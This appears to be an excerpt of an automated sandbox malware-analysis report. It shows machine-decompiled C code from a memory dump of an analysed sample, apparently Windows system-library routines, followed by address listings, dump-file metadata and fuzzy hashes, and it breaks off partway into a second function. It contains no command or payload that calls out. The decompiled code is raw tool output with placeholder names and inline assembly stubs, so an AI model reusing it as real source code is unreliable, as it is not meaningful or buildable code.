				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x2a31178);
				E029AD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E02A24C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0299D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E02A25542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x2a460e8;
								if( *0x2a460e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x2a460e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E02999710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E02996DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0299F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0299F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0299F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0299FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0299FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0299F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0299F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E02A24CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E029AD130(_t427, _t494, _t511);
				}
			}

0x02a25ba5
0x02a25baa
0x02a25baf
0x02a25bb4
0x02a25bb6
0x02a25bbc
0x02a25bbe
0x02a25bc4
0x02a25bcd
0x02a25bd3
0x02a25bd6
0x02a25bdc
0x02a25be0
0x02a25be3
0x02a25beb
0x02a25bf2
0x02a25bf8
0x02a25bfe
0x02a25c04
0x02a25c0e
0x02a25c18
0x02a25c1f
0x02a25c25
0x02a25c2a
0x02a25c2c
0x02a25c32
0x02a25c3a
0x02a25c3f
0x02a25c42
0x02a25c48
0x02a25c5b
0x02a25c5b
0x02a25c2c
0x02a25cb7
0x02a25cb9
0x02a25cbf
0x02a25cc2
0x02a25cca
0x02a25ccb
0x02a25ccb
0x02a25cd1
0x02a25cd7
0x02a25cda
0x02a25ce1
0x02a25ce4
0x02a25ce7
0x02a25ced
0x02a25cf3
0x02a25cf9
0x02a25cff
0x02a25d08
0x02a25d0a
0x02a25d0e
0x02a25d10
0x00000000
0x00000000
0x02a25d16
0x02a25d1a
0x00000000
0x00000000
0x02a25d20
0x02a25d22
0x02a25d25
0x02a25d2f
0x02a25d2f
0x02a25d33
0x02a25d3d
0x02a25d49
0x02a25d4b
0x00000000
0x00000000
0x02a25d5a
0x02a25d5d
0x02a25d60
0x00000000
0x00000000
0x02a25d66
0x02a25d69
0x00000000
0x00000000
0x02a25d6f
0x02a25d6f
0x02a25d73
0x02a25d79
0x02a25d7f
0x02a25d86
0x02a25d95
0x02a25d98
0x02a25dba
0x02a25dcb
0x02a25dce
0x02a25dd3
0x02a25dd6
0x02a25dd8
0x02a25de6
0x02a25dec
0x02a25dee
0x02a25df1
0x02a25df3
0x02a2635a
0x02a2635a
0x00000000
0x02a2635a
0x02a25dfe
0x02a25e02
0x02a25e05
0x02a25e07
0x02a25e10
0x02a25e13
0x02a25e1b
0x02a25e1c
0x02a25e21
0x02a25e22
0x02a25e23
0x02a25e25
0x02a25e2a
0x02a25e2c
0x02a25e2e
0x02a25e36
0x02a25e39
0x02a25e42
0x02a25e47
0x02a25e4d
0x02a25e54
0x02a25e54
0x02a25e54
0x02a25e2e
0x02a25e5c
0x02a25e5f
0x02a25e62
0x02a25e64
0x02a25e6b
0x02a25e70
0x02a25e7a
0x02a25e7a
0x02a25e7a
0x02a25e6b
0x02a25e7e
0x02a25e7f
0x02a25e7f
0x02a25e81
0x02a25e87
0x02a25e8b
0x02a25e8c
0x02a25e8c
0x02a25e8c
0x02a25e9a
0x02a25e9c
0x02a25ea2
0x02a25ea6
0x02a25f50
0x02a25f50
0x02a25f57
0x02a25f66
0x02a25f66
0x02a25f66
0x02a25f68
0x02a25f6a
0x02a263d0
0x00000000
0x02a25f70
0x02a25f70
0x02a25f91
0x02a25f9c
0x02a25f9e
0x02a25fa4
0x02a25fa6
0x02a2638c
0x02a26392
0x02a263a1
0x02a263a7
0x02a263af
0x02a263af
0x02a263bd
0x02a263d8
0x00000000
0x02a263d8
0x02a25fac
0x02a25fb2
0x02a25fb4
0x02a25fbd
0x02a25fc6
0x02a25fce
0x02a25fd4
0x02a25fdc
0x02a25fec
0x02a25fed
0x02a25fee
0x02a25fef
0x02a25ff9
0x02a25ffa
0x02a25ffb
0x02a25ffc
0x02a26000
0x02a26004
0x02a26012
0x02a26012
0x02a26018
0x02a26019
0x02a2601a
0x02a2601b
0x02a2601c
0x02a26020
0x02a26059
0x02a2605c
0x02a26061
0x02a26061
0x02a26022
0x02a26022
0x02a26022
0x02a26025
0x02a2602a
0x02a2602b
0x02a26031
0x02a26037
0x02a26038
0x02a2603e
0x02a26048
0x02a26049
0x02a2604a
0x02a2604b
0x02a2604c
0x02a2604d
0x02a26053
0x02a26054
0x02a26054
0x02a26062
0x02a26065
0x02a26067
0x02a2606a
0x02a26070
0x02a26075
0x02a26076
0x02a26081
0x02a26087
0x02a26095
0x02a26099
0x02a2609e
0x02a260a4
0x02a260ae
0x02a260b0
0x02a260b3
0x02a260b6
0x02a260b8
0x02a260ba
0x02a260ba
0x02a260ba
0x02a260ba
0x02a260be
0x02a260c0
0x02a260c5
0x02a260c5
0x02a260c5
0x02a260c6
0x02a260cd
0x02a26114
0x02a260cf
0x02a260cf
0x02a260d4
0x02a260d5
0x02a260da
0x02a260db
0x02a260e1
0x02a260e2
0x02a260e8
0x02a260f8
0x02a260fd
0x02a260fe
0x02a26102
0x02a26104
0x02a26107
0x02a26109
0x02a2610b
0x02a2610b
0x02a2610b
0x02a2610b
0x02a2610f
0x02a2610f
0x02a26117
0x02a2611a
0x02a2611f
0x02a26125
0x02a26134
0x02a26139
0x02a2613f
0x02a26146
0x02a26148
0x02a2614b
0x02a2614d
0x02a2614f
0x02a2614f
0x02a2614f
0x02a2614f
0x02a26153
0x02a26159
0x02a26159
0x02a2615c
0x02a26163
0x02a26169
0x02a2616c
0x02a26172
0x02a26181
0x02a26186
0x02a26187
0x02a2618b
0x02a26191
0x02a26195
0x02a261a3
0x02a261bb
0x02a261c0
0x02a261c3
0x02a261cc
0x02a261d0
0x02a261dc
0x02a261de
0x02a261e1
0x02a261e4
0x02a261e6
0x02a261e8
0x02a261e8
0x02a261e8
0x02a261e8
0x02a261e6
0x02a261ec
0x02a261f3
0x02a26203
0x02a26209
0x02a2620a
0x02a26216
0x02a2621d
0x02a26227
0x02a26241
0x02a26246
0x02a2624c
0x02a26257
0x02a26259
0x02a2625c
0x02a2625e
0x02a26260
0x02a26260
0x02a26260
0x02a26260
0x02a2625e
0x02a26264
0x02a26267
0x02a26269
0x02a26315
0x02a26315
0x02a2631b
0x02a2631e
0x02a26324
0x02a26327
0x02a2632f
0x02a26330
0x02a26333
0x02a2633a
0x02a2633c
0x02a26335
0x02a26335
0x02a26335
0x02a2633f
0x02a26342
0x02a2634c
0x02a26352
0x02a26355
0x02a26355
0x02a26359
0x00000000
0x02a2626f
0x02a26275
0x02a26275
0x02a26278
0x02a2627e
0x02a2627e
0x02a26281
0x02a26287
0x02a2628d
0x02a26298
0x02a2629c
0x02a262a2
0x02a2629e
0x02a2629e
0x02a2629e
0x02a262a7
0x02a262a7
0x02a262aa
0x02a262b0
0x02a262f0
0x02a262f0
0x02a262f2
0x02a262f8
0x02a262fd
0x02a262b2
0x02a262b2
0x02a262b2
0x02a262b5
0x02a262dd
0x02a262e2
0x02a262e5
0x02a262b7
0x02a262b8
0x02a262bb
0x02a262bd
0x02a262c0
0x02a262c4
0x02a262cd
0x02a262cd
0x02a262c0
0x02a262bb
0x02a262b5
0x02a26302
0x02a26303
0x02a26305
0x02a26305
0x02a26305
0x02a2630c
0x02a2630c
0x00000000
0x02a2627e
0x02a26269
0x02a25eac
0x02a25ebb
0x02a25ebe
0x02a25ecb
0x02a25ecb
0x02a25ece
0x02a25ece
0x02a25ed4
0x02a25ed7
0x02a25ed9
0x02a25edb
0x02a25edb
0x02a25ee1
0x02a25ee1
0x02a25ee3
0x02a25f20
0x02a25f20
0x02a25ee5
0x02a25ee5
0x02a25ee5
0x02a25ee8
0x02a25f11
0x02a25f18
0x02a25eea
0x02a25eea
0x02a25eed
0x02a25ef2
0x02a25ef8
0x02a25efb
0x02a25f0a
0x02a25f0a
0x02a25eed
0x02a25ee8
0x02a25f22
0x02a25f28
0x00000000
0x00000000
0x02a25f30
0x02a25f31
0x02a25f37
0x02a25f3a
0x02a25f3d
0x02a25f44
0x00000000
0x00000000
0x00000000
0x02a25f46
0x02a25f48
0x02a25f4d
0x00000000
0x02a25f4d
0x02a25dda
0x02a25ddf
0x00000000
0x02a25ddf
0x02a25dd8
0x02a25da7
0x02a25da9
0x02a25dac
0x02a25dae
0x00000000
0x02a25db4
0x02a25db4
0x00000000
0x02a25db4
0x02a25dae
0x02a25d88
0x02a25d8d
0x02a26363
0x02a26369
0x02a2636a
0x02a26370
0x02a26372
0x02a2637a
0x02a2637b
0x02a2637d
0x00000000
0x00000000
0x02a2637f
0x02a26385
0x00000000
0x02a26385
0x02a25d38
0x02a25d3b
0x00000000
0x00000000
0x00000000
0x02a25d3b
0x02a25d27
0x02a25d29
0x00000000
0x00000000
0x00000000
0x02a26360
0x00000000
0x02a26360
0x02a25c10
0x02a25c10
0x02a263da
0x02a263e5
0x02a263e5

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 281e7d36b0f805639972e86f7b940076b116e574737789a532d489b967c65958
Instruction ID: 4560b5a3fd01ce2e946fbd5b0218acc4dd65784a9dba76e321520d1bfe3b3ccb
Opcode Fuzzy Hash: 281e7d36b0f805639972e86f7b940076b116e574737789a532d489b967c65958
Instruction Fuzzy Hash: 28423A75D01229CFDB24CF68C980BA9B7B5FF49704F1481AAD85DEB242DB349989CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02974120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E02974120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
